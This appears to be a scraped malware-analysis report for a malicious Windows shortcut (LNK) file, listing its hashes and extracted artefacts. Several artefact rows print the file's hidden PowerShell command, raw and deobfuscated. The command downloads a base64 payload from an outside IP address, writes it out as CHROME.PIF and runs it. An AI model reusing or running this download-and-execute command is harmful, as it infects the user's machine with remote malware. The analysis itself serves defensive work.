Malva.RE by Yneos: Advanced Static & Stuctural Extended Malware Analysis for Cybersecurity Experts

Malicious

a5d39484b4ae07720549bfe225c33c79fab846[...]lnk.bin

LNK File

|

MD5: cfd8f214093362cb2ef0e6c77d388067

|

Size: 202.56 KB

|

application/x-ms-shortcut

Print

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	cfd8f214093362cb2ef0e6c77d388067
Sha1	8482a42f02fc5b6a1dcc35a2ad6422950b8c98d2
Sha256	a5d39484b4ae07720549bfe225c33c79fab846e00eaa7a8a97e7d14044370c28
Sha384	91ecc884948c9c78fc7de29888cece70e40eb4bab2ebe9e17b73bc88a6d65a148ea08db5c56912a5ac7d338fe949fd9f
Sha512	42be2dd7d822ae0965768d5cb7bd41b1ca4a9aa3466aa101ab92d2b0d9ce11bf5ac9512d97f0bf78439a6ebadd39a33e626e9b0a57ff3c11c19e0063e7feae5b
SSDeep	3072:qKbqArIUlBDY9hToTRWCm3Nb9zDxxXNjh/zlO0lHobchyxv8+VZxVJHsQFV+EHqw:p2AP+TY4x19zDfv/4o+chyxzjHsQFVTV
TLSH	8714F164D66B0F9EFDA509FC0C6E2B5A4C8D7D323D33C4F1CD9A240B42255961AB2E1B

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -WindowStyle hidden -noLogo -Command -NoExit (new-object System.Net.WebClient).DownloadFile('http://84.252.123.137/music/output.txt','C:\\Users\\Public\\png'); $file = 'C:\\Users\\Public\\png'; [System.Convert]::FromBase64String((Get-Content $file)) \| Set-Content C:\\Users\\Public\\CHROME.PIF -Encoding Byte; start C:\\Users\\Public\\CHROME.PIF;
LNK: Command Execution	powershell.exe -WindowStyle hidden -noLogo -Command -NoExit (new-object System.Net.WebClient).DownloadFile('http://84.252.123.137/music/output.txt','C:\\Users\\Public\\png'); $file = 'C:\\Users\\Public\\png'; [System.Convert]::FromBase64String((Get-Content $file)) \| Set-Content C:\\Users\\Public\\CHROME.PIF -Encoding Byte; start C:\\Users\\Public\\CHROME.PIF;
Deobfuscated PowerShell	-windowstyle "hidden" -noLogo -Command -NoExit (New-Object "System.Net.WebClient")."DownloadFile"("http://84.252.123.137/music/output.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF"
Deobfuscated PowerShell	-windowstyle "hidden" -noLogo -Command -NoExit (New-Object "System.Net.WebClient")."DownloadFile"("http://84.252.123.137/music/output.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF"
Deobfuscated PowerShell	-noexit (New-Object "System.Net.WebClient")."DownloadFile"("http://84.252.123.137/music/output.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF"
Deobfuscated PowerShell	-noexit (New-Object "System.Net.WebClient")."DownloadFile"("http://84.252.123.137/music/output.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF"

a5d39484b4ae07720549bfe225c33c79fab846e00eaa7a8a97e7d14044370c28.lnk.bin (202.56 KB)

An error has occurred. This application may no longer respond until reloaded. Reload 🗙